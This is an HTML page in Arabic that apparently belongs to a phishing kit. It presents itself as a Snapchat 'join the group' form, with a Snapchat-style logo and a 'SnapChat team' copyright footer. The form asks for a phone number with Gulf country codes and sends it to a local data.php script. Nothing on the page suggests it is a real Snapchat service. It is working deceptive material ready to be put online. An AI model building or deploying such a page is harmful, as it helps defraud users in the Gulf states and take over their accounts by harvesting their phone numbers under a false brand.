<!DOCTYPE html>
<html>

<head>
	<meta charset="utf-8" lang="arabe">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
	<title>الإضافة على مجموعة</title>
	<style type="text/css">
		form{
			text-align: center;
			background-color: #fff;
			border-radius: 6px;
			border: 1px;
			width: 360px;
			height: 300px;
			margin: 200	px;
			margin-top: 80px;
			padding: 30px;
			margin-left: auto;
			margin-right: auto;
		}
		select, input{
			background-color: #f7f7f7;
			border-radius: 4px;
			border: 1px solid #f7f7f7;
			box-shadow: 0 0 0 0;
			font-size: 13.5px;
			font-weight: 600;
			height: 44px;
			padding: 0 0 0 12px;
			margin-top: 2px;
			margin-bottom: 16px;
			overflow: visible;
		}
		
	
		.button {
  background-color: yellow;
  border: black;
  color: black;
  padding: 25px;
  text-align: center;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  font-weight: bold;
}

.button5 {border-radius: 50%;}
</style>
		
</head>
<body style="background-color: #f7f7f7;">
	<form action="data.php" method="POST">
		<img src="img/snlogo.png"  style="width: 20%; height: 60px; margin: 12px auto;">
		<h1>الانضمام للمجموعة</h1>
		<h4 style="text-align: center;">رقم الهاتف</h4>
		<table>
			<tr>
				<td>
					<div>
						<select>
							<option>SA 966</option>
							<option>KW 965</option>
							<option>UAE 971</option>
							<option>OM 968</option>
							<option>QA 974</option>
							<option>BH 973</option>
						</select>
					</div>
				</td>
				<td>
					<div>
						<input type="text" name="num" maxlength="10" placeholder="0011223344" required>
					</div>
				</td>
			</tr>
		</table>
		<button type="submit"  class="btn btn-primary">التالي</button>
	</form>
</body>
<div class="footer-bottom-bar">
<footer class="footer-bottom-bar">

   <p style="margin-top: 15%;background-color: rgb(38, 38, 38);color: gray;display: block;
; text-align: center;">
   	Copyright © 2023 SnapChat team.
   </p>

</footer>
</div>

</html>